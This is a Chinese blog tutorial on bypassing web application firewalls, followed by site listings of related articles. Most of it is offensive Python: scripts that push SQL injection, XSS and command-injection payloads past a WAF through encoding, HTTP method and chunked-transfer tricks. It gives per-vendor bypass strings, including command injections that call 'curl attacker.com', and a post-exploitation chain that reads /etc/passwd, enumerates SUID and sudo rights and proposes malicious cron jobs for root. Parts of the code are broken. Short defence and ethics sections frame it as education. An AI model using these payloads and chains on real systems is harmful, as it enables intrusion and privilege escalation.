WAF绕过教程:与智能门卫的捉迷藏游戏

最新推荐文章于 2025-12-19 15:04:39 发布
原创 最新推荐文章于 2025-12-19 15:04:39 发布 · 994 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#游戏 #python #c语言 #汇编 #网络安全 #系统安全 #web安全

前言:当门卫太聪明时怎么办?

本文章仅提供学习,切勿将其用于不法手段!

想象你要进入一个高度安保的大楼,门口有一位极其聪明的门卫(WAF)。他记得所有已知的危险物品特征,会检查每个人的包裹,甚至能识别伪装。但再聪明的门卫也有盲点和规则限制。WAF(Web应用防火墙)绕过就是这样一门艺术——找到门卫检查规则的漏洞,巧妙地"伪装"恶意请求,让它看起来像是合法请求。

第一部分:WAF机制原理解析

1.1 什么是WAF?

WAF是Web应用防火墙,就像网站的智能门卫:

正常请求: GET /index.php?page=home → 允许通过
恶意请求: GET /index.php?page=<script>alert(1)</script> → 拦截!

但聪明的攻击者会这样伪装:

GET /index.php?page=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E

1.2 WAF如何工作?

WAF基于多层检测机制:

  1. 规则库匹配​:已知攻击模式的签名库
  2. 行为分析​:异常请求模式检测
  3. 机器学习​:识别新型攻击模式
  4. 协议验证​:检查HTTP协议合规性

1.3 为什么WAF能被绕过?

WAF不是万能的,因为:

  • 规则滞后性​:总是落后于新型攻击技术
  • 误报权衡​:太严格会影响正常业务
  • 性能限制​:深度检测影响网站性能
  • 逻辑漏洞​:检测逻辑本身可能有缺陷

第二部分:WAF绕过实战技术

2.1 环境准备

使用测试环境练习WAF绕过:

# 使用ModSecurity测试环境
docker run -d -p 80:80 owasp/modsecurity-crs

访问 测试WAF防护

2.2 基础绕过检测

#!/usr/bin/env python3
import requests
from urllib.parse import quote

def test_waf_bypass(url, payload):
    # 测试各种编码和混淆技术
    techniques = [
        payload,  # 原始payload
        quote(payload),  # URL编码
        quote(quote(payload)),  # 双重URL编码
        payload.replace(' ', '%20'),  # 空格编码
        payload.replace('=', '%3D'),  # 等号编码
        payload.upper(),  # 大写转换
        payload.lower(),  # 小写转换
    ]
    
    for technique in techniques:
        test_url = f"{url}?input={technique}"
        try:
            response = requests.get(test_url, timeout=5)
            if response.status_code == 200 and "blocked" not in response.text:
                print(f"可能绕过: {technique}")
                return technique
        except:
            continue
    
    return None

# 测试SQL注入绕过
sql_payload = "' UNION SELECT 1,2,3 -- "
test_waf_bypass("http://localhost", sql_payload)

2.3 编码与混淆技术

def advanced_encoding(payload):
    # 多种编码技术
    encodings = {
        'url': quote(payload),
        'double_url': quote(quote(payload)),
        'unicode': ''.join([f'%u{ord(c):04x}' for c in payload]),
        'html': ''.join([f'&#{ord(c)};' for c in payload]),
        'base64': f"eval(base64_decode('{payload.encode('base64')}'))",
        'hex': ''.join([f'%{ord(c):02x}' for c in payload]),
    }
    
    return encodings

def test_encodings(url, payload):
    encodings = advanced_encoding(payload)
    
    for name, encoded_payload in encodings.items():
        test_url = f"{url}?input={encoded_payload}"
        try:
            response = requests.get(test_url)
            if response.status_code == 200 and "blocked" not in response.text:
                print(f"{name} 编码绕过成功")
                return encoded_payload
        except:
            continue
    
    return None

2.4 请求拆分与变形

def request_manipulation(url, payload):
    # HTTP请求拆分技术
    headers = {
        'X-Forwarded-For': '127.0.0.1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Referer': url,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1'
    }
    
    # 分块传输编码
    session = requests.Session()
    session.headers.update(headers)
    
    # 测试各种HTTP方法
    methods = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'HEAD']
    for method in methods:
        try:
            if method == 'GET':
                response = session.get(f"{url}?input={payload}")
            elif method == 'POST':
                response = session.post(url, data={'input': payload})
            
            if response.status_code == 200 and "blocked" not in response.text:
                print(f"{method} 方法绕过成功")
                return True
        except:
            continue
    
    return False

第三部分:高级绕过技术

3.1 基于规则的绕过

def rule_specific_bypass(payload, waf_type):
    # 针对特定WAF规则的绕过
    bypasses = {
        'modsecurity': {
            'sql': "1'/*!UNION*//*!SELECT*/1,2,3--",
            'xss': "<img src=x onerror=alert(1)>",
            'rce': ";$(curl attacker.com)",
        },
        'cloudflare': {
            'sql': "1'UNION/**/SELECT 1,2,3--",
            'xss': "<svg onload=alert(1)>",
            'rce': "|curl attacker.com",
        },
        'aws': {
            'sql': "1'UNION%0bSELECT 1,2,3--",
            'xss': "javascript:alert(1)",
            'rce': "`curl attacker.com`",
        }
    }
    
    return bypasses.get(waf_type, {}).get(payload.type, payload.original)

3.2 时间延迟绕过

def time_based_bypass(url, payload):
    # 时间延迟检测绕过
    delay_payloads = [
        f"{payload} AND SLEEP(5)",
        f"{payload} WAITFOR DELAY '0:0:5'",
        f"{payload} pg_sleep(5)",
    ]
    
    for delay_payload in delay_payloads:
        start_time = time.time()
        try:
            response = requests.get(f"{url}?input={delay_payload}", timeout=10)
            end_time = time.time()
            
            # 检查响应时间是否明显延长
            if end_time - start_time > 4.5:
                print(f"时间延迟绕过成功: {delay_payload}")
                return True
        except requests.exceptions.Timeout:
            print(f"请求超时,可能绕过成功: {delay_payload}")
            return True
    
    return False

3.3 协议级别绕过

def protocol_level_bypass(url, payload):
    # HTTP协议级别绕过
    # 分块传输编码
    def chunked_encoding(data):
        chunks = []
        for i in range(0, len(data), 10):
            chunk = data[i:i+10]
            chunks.append(f"{len(chunk):x}\r\n{chunk}\r\n")
        chunks.append("0\r\n\r\n")
        return ''.join(chunks)
    
    # 构造特殊请求
    headers = {
        'Transfer-Encoding': 'chunked',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    
    chunked_data = chunked_encoding(f"input={payload}")
    
    try:
        response = requests.post(url, headers=headers, data=chunked_data)
        if response.status_code == 200:
            print("分块传输编码绕过成功")
            return True
    except:
        pass
    
    return False

第四部分:综合绕过实战

4.1 自动化WAF识别

def identify_waf(url):
    # 识别目标WAF类型
    waf_signatures = {
        'modsecurity': ['ModSecurity', 'OWASP'],
        'cloudflare': ['cloudflare', 'cf-ray'],
        'aws': ['aws', 'x-amz-'],
        'imperva': ['imperva', 'incapsula'],
    }
    
    try:
        response = requests.get(url)
        headers = response.headers
        body = response.text
        
        for waf_name, signatures in waf_signatures.items():
            for signature in signatures:
                if signature in str(headers).lower() or signature in body.lower():
                    print(f"检测到WAF: {waf_name}")
                    return waf_name
    except:
        pass
    
    print("未识别到WAF或无法访问")
    return None

4.2 智能绕过系统

class WAFBypasser:
    def __init__(self, target_url):
        self.target_url = target_url
        self.waf_type = identify_waf(target_url)
        self.successful_payloads = []
    
    def test_bypass(self, payload_type, test_payloads):
        for payload in test_payloads:
            encoded_payload = self.apply_techniques(payload)
            if self.test_payload(encoded_payload):
                self.successful_payloads.append(encoded_payload)
                return True
        return False
    
    def apply_techniques(self, payload):
        # 应用多种绕过技术
        techniques = [
            self.url_encode,
            self.double_encode,
            self.unicode_encode,
            self.case_manipulation,
            self.comment_obfuscation,
        ]
        
        for technique in techniques:
            modified_payload = technique(payload)
            if self.test_payload(modified_payload):
                return modified_payload
        
        return payload
    
    def comprehensive_attack(self):
        # 综合攻击测试
        attack_types = {
            'sql': ["' OR 1=1 --", "UNION SELECT 1,2,3", "SELECT * FROM users"],
            'xss': ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>"],
            'rce': [";ls -la", "|id", "`whoami`"]
        }
        
        for attack_type, payloads in attack_types.items():
            if self.test_bypass(attack_type, payloads):
                print(f"{attack_type.upper()} 绕过成功")
                return True
        
        return False

第五部分:从WAF绕过到Root权限

5.1 漏洞利用链构建

def build_exploit_chain(waf_bypass_payload):
    # 构建完整的利用链
    exploit_chain = [
        # 1. 信息收集
        "id; whoami; uname -a",
        "cat /etc/passwd",
        "ifconfig; netstat -tuln",
        
        # 2. 漏洞探测
        "find / -perm -4000 -type f 2>/dev/null",
        "sudo -l",
        "crontab -l",
        
        # 3. 权限提升
        # 根据系统情况选择不同的提权方法
        "echo '尝试内核漏洞提权'",
        "echo '尝试SUID提权'",
        "echo '尝试sudo权限提权'",
    ]
    
    successful_exploits = []
    
    for cmd in exploit_chain:
        # 使用之前成功的WAF绕过payload格式
        exploit_cmd = waf_bypass_payload.replace("PAYLOAD", cmd)
        if execute_exploit(exploit_cmd):
            successful_exploits.append(cmd)
    
    return successful_exploits

5.2 自动化提权框架

def auto_privesc(waf_bypasser):
    # 自动化权限提升框架
    privesc_methods = [
        # 内核漏洞
        {
            'name': '内核漏洞',
            'check': 'uname -a',
            'exploit': '根据内核版本选择对应的exploit'
        },
        # SUID提权
        {
            'name': 'SUID提权',
            'check': 'find / -perm -4000 -type f 2>/dev/null',
            'exploit': '利用find、vim等SUID程序'
        },
        # Sudo权限
        {
            'name': 'Sudo提权',
            'check': 'sudo -l',
            'exploit': '利用sudo权限执行root命令'
        },
        # 计划任务
        {
            'name': '计划任务',
            'check': 'crontab -l; ls -la /etc/cron*',
            'exploit': '写入恶意计划任务'
        }
    ]
    
    for method in privesc_methods:
        print(f"尝试 {method['name']} 提权...")
        
        # 执行检查命令
        check_cmd = waf_bypasser.apply_techniques(method['check'])
        check_result = waf_bypasser.execute_command(check_cmd)
        
        if check_result and method['name'] in check_result:
            print(f"发现 {method['name']} 可能性")
            
            # 执行提权命令
            exploit_cmd = waf_bypasser.apply_techniques(method['exploit'])
            exploit_result = waf_bypasser.execute_command(exploit_cmd)
            
            if exploit_result and 'root' in exploit_result:
                print(f"{method['name']} 提权成功!")
                return True
    
    return False

第六部分:防御与深度思考

6.1 为什么WAF绕过可能?

  1. 规则局限性​:基于已知模式,难以应对未知攻击
  2. 性能权衡​:深度检测影响用户体验
  3. 误报问题​:过于严格会阻断正常业务
  4. 协议复杂性​:HTTP协议特性可被利用

6.2 增强WAF防护

# 多维度防御策略
def enhanced_waf_protection():
    strategies = [
        # 1. 多层次检测
        "规则库 + 行为分析 + 机器学习",
        
        # 2. 动态规则更新
        "实时威胁情报集成",
        
        # 3. 协议严格校验
        "严格的HTTP协议合规性检查",
        
        # 4. 频率限制
        "请求频率和异常行为监控",
        
        # 5. 人机验证
        "可疑流量引入验证码",
        
        # 6. 深度学习
        "AI驱动的异常检测",
    ]
    
    return "深度防御 + 智能分析 + 持续更新"

6.3 超越WAF的防护

真正的安全需要多层次防护:

  1. 安全开发​:在代码层面预防漏洞
  2. 输入验证​:严格的输入验证和过滤
  3. 输出编码​:适当的输出编码防止XSS
  4. 权限控制​:最小权限原则
  5. 定期审计​:安全代码审计和渗透测试
  6. 安全意识​:开发人员安全培训

第七部分:伦理思考与责任

7.1 安全研究的道德边界

  • 授权测试​:只在获得明确授权的系统上进行测试
  • 负责任披露​:发现漏洞后给厂商合理时间修复
  • 教育目的​:技术知识应用于建设更安全的世界
  • 法律意识​:了解并遵守相关法律法规

7.2 WAF绕过的哲学启示

WAF绕过技术教会我们几个重要道理:

  1. 没有绝对安全​:任何防护都有被绕过的可能
  2. 持续演进​:安全需要持续改进和适应
  3. 深度防御​:不能依赖单一安全措施
  4. 理解对手​:最好的防御是理解攻击方法

结语:智能攻防的永恒博弈

WAF绕过是一场智能的攻防博弈,就像下棋一样需要策略和创造力。但真正的安全专家不是那些能够绕过所有防护的人,而是那些能够设计出让绕过变得极其困难的系统的人。

深度思考​:在AI和机器学习时代,WAF技术会如何演进?新的绕过技术又会如何发展?

记住:技术能力应该用于保护和建设,而不是破坏和攻击。

免责声明:本文所有技术内容仅用于教育目的和安全研究。未经授权的系统访问是违法行为。请始终在合法授权范围内进行安全测试。

WAF 安全实践】
D-river博客
03-21 1287
请求检查:WAF 深度扫描请求行、头、参数、正文,覆盖协议合规性和攻击特征。响应检查:高级 WAF 会监控敏感数据泄露、错误信息和安全头配置。绕过风险:需结合多层防御(输入校验、输出过滤、WAF)形成纵深防护。
反序列化漏洞 Waf 绕过技术:解析执行的认知博弈
syg6921008的博客
04-08 1674
在当前的安全攻防实践中,针对反序列化漏洞的 WAF 检测机制仍存在诸多盲区不完善之处。为了更深入地理解其绕过方式,我查阅了大量公开研究、实战案例工具源码,并系统性地梳理出了9 类典型的反序列化漏洞 WAF 绕过技术策略。“在不被识别为恶意的前提下,如何让 payload 既具备混淆性,又能精准执行?WAF 绕过从来不只是编码和隐藏,更是一种关于解析、执行路径安全策略认知的博弈。希望本文的内容,能为你的实战思路带来一些启发。💡。
waf绕过网络安全绕过
m0_71332744的博客
08-07 2006
name='';//使用defun获取assert。
浅谈WAF绕过技巧
lza20001103的博客
09-05 1461
渗透测试--浅谈WAF绕过技巧
文件上传绕过WAF:雷池、宝塔、安全狗技巧
wcl20010的博客
06-30 1702
WAF会检查上传文件的MIME类型(Content-Type)和文件扩展名,判断是否为可执行文件或恶意文件类型。例如,阻止上传.php.jsp.asp等脚本文件。WAF会对上传文件的内容进行深度分析,通过特征码匹配、沙箱分析等方式,检测文件中是否包含恶意代码(如WebShell特征码)。WAF会检查文件名是否包含特殊字符、双扩展名等异常情况,以防止攻击者通过文件名混淆绕过检测。WAF会分析HTTP请求包的结构,特别是部分的和boundary等字段,确保其符合HTTP协议规范,防止畸形请求绕过
如何绕过WAF实现SQL注入攻击?​
w2361734601的博客
04-12 1525
在渗透测试中,SQL注入(SQLi)始终是Web安全的核心漏洞之一。然而,随着企业广泛部署Web应用防火墙(WAF),传统的注入攻击往往会被拦截。绕过WAF的SQL注入需要结合对目标防护规则的深入分析,灵活运用混淆技术。作为防御方,需通过多层防护机制(代码安全+WAF+监控)构建纵深防御体系。WAF的正则规则通常区分大小写,通过混合大小写插入随机空白符可绕过检测。利用时间盲注的延迟特性,避免触发WAF的响应内容检测。​:通过混淆攻击载荷,绕过正则匹配和语义分析。)分割关键词,干扰WAF的语义分析。
sql注入10之waf绕过
jonhswei的博客
04-19 1238
安全工具拦截原理: 外部安全工具,如安全狗、宝塔云盾等,通过拦截发送过来的数据中的敏感字来实现安全防护。如果数据包含敏感字,则阻止其通过。绕过拦截的方法: 了解安全工具的拦截规则后,可以尝试寻找其未拦截的内容或空子,从而有机可乘,绕过安全工具的检测。WAF绕过: 需结合多种方法,如大小写绕过、编码绕过、双写绕过等。前提条件: 更改提交方式需确保后台能接收,数据本身处理需考虑防御软件更新。暴力破解: Fuzz测试和暴力破解可作为辅助手段。
文件上传漏洞WAF绕过方法
永远是少年
10-09 2314
今天继续给大家介绍渗透测试相关知识,本文主要文件上传漏洞WAF绕过方法。 一、文件上传数据包解析 二、文件上传WAF防御逻辑 三、文件上传常见绕过方式 四、写在最后
Cloudflare防护机制全面解析:WAF绕过技术安全防护策略
qq_33253945的博客
08-11 1984
Cloudflare采用多层防护架构,包括DDoS防护、Bot管理、WAF规则、频率控制和SSL加密等核心技术。其WAF系统基于托管规则、自定义规则和频率限制构建防护,并通过威胁评分机制评估风险。Bot Management系统采用JS挑战、浏览器指纹检测和无感验证技术识别自动化流量。5秒盾则通过延迟验证和反自动化技术确保访问真实性。针对这些防护机制,可通过模拟真实浏览器环境和优化请求头等技术实现绕过,但仅限安全研究用途。企业应结合Cloudflare的多层防护和自定义规则来强化网站安全
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
精选资源
长亭waf绕过1.pdf
07-09
长亭waf绕过1
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
unity-向量数学 - “方向力的语言
最新发布
GameDesign
12-19 1458
/ (0, 0, 1) 或 -1,取决于顺序。// 0(因为cos90°=0)// 2D向量(UI、2D游戏)// 5 (勾股定理:√(3²+4²)=5)Vector3 input = new Vector3(0.5f, 0, 0.5f);// 3D向量(3D游戏)Vector3 direction = new Vector3(1, 0, 0);
3D游戏数学基础指南
GameDesign
12-18 525
不用担心,我们不需要成为数学家,而是要学会“游戏程序员”式的数学思维。在进行复杂变换时(例如,先旋转再平移 vs 先平移再旋转),顺序不同结果截然不同。这是Unity处理3D旋转的默认方式,旨在解决传统欧拉角(0-360度的角度)的“万向节死锁”问题。从“如何让角色朝鼠标点击的位置移动”这样的具体问题出发,你会自然地学会向量减法、归一化和。:一个4x4的数字网格,可以一次性表示物体的所有变换信息。:计算面的法线、计算旋转轴(例如,让物体绕某个轴旋转)。:结果是一个新的向量,垂直于原始两个向量所在的平面。
LeetCode热题100--45. 跳跃游戏 II--中等
2301_80071187的博客
12-17 239
该问题要求在给定数组中,从起点出发,每次可跳跃最多nums[i]步,求到达终点的最小跳跃次数。解法采用贪心算法,维护当前可到达的最远位置(curRight)和下一步能到达的最远位置(nextRight)。遍历数组时不断更新nextRight,当到达curRight时进行跳跃并更新curRight为nextRight,同时增加跳跃次数。这种方法确保每次跳跃都选择能到达的最远位置,从而获得最小跳跃次数。时间复杂度O(n),空间复杂度O(1)。示例输入[2,3,1,1,4]输出2,即从索引0跳1步到1,再跳3步到
合成植物大战僵尸 安卓原生APP Cocos游戏 支持Sigmob
12-17 421
游戏源码简介】一款基于广告激励的收益型游戏,用户通过观看视频广告获取收益并可提现。游戏采用安卓WebView封装H5技术,支持扩展多款H5小游戏。配套企业级网站源码采用响应式设计,兼容多终端,适用于外贸及产品类企业。技术架构包含PHP+ThinkPHP后台、安卓原生前端及CocosCreator游戏核心,支持主流广告平台对接。源码具有代码规范、SEO友好、多语言适配等特点,便于二次开发。
OpenSpeedy 是一款开源免费的游戏变速工具
sinat_38424109的博客
12-19 170
官方网站:https://github.com/game1024/OpenSpeedyOpenSpeedy 是一款开源免费的游戏变速工具,让你的游戏突破帧率限制,提供更流畅丝滑的游戏加速体验。软件可可自定义变速倍率,对多种游戏引擎兼容性良好,低系统资源占用,同时可以加速x86和x64平台进程。软件无内核侵入性,Ring3层Hook,不破坏系统内核。
【推荐100个unity插件】末日废土大游乐场——Huge Playground Post Apocalyptic
向宇
12-17 95
本文介绍了Unity大型后末日场景资源"Huge Playground Post-Apocalyptic"的安装使用指南。主要内容包括:1)资源采用场景叠加系统管理大型地图,需安装URP渲染管线;2)详细设置步骤包含构建设置、SSD安装建议、URP配置等;3)演示场景配置方法,包括加载9个区域场景和程序化生成元素;4)性能优化建议,如SSAO禁用和距离显示脚本使用。该资源适用于创建复杂开放世界环境,文档还提供了故障排除和作者联系方式。
动作游戏网游:帧同步下的动画同步
Tel17610887670的博客
12-16 170
本文介绍了在帧同步方案下实现动画同步的方法。通过解耦逻辑层渲染帧,采用进度控制替代Unity动画自驱机制,使用Animator.Play()接口精确控制动画播放进度。文章提供了MoveAnimationController脚本实现方案,核心包括冻结动画速度、通过moveProgress参数控制动画状态,并详细说明了关键API的使用方法。该方案能有效确保多客户端动画表现同步,适用于需要严格同步的网络游戏场景。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值